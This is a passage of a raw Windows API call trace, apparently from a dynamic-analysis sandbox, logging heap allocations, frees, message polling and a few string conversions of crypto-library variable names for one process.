[0237.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.772] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0237.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0237.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0237.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd667) returned 0x2f14818 [0237.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0237.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0237.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd667) returned 0x2f2f4f8 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0237.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0237.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0237.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0237.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0237.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0237.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0237.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0237.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.784] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0237.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0237.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.784] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0237.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0237.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0237.785] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0237.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0237.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0237.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0237.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0237.786] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0237.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0237.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0237.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0237.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0237.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.852] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0237.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0237.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0237.855] RtlAllocateHeap 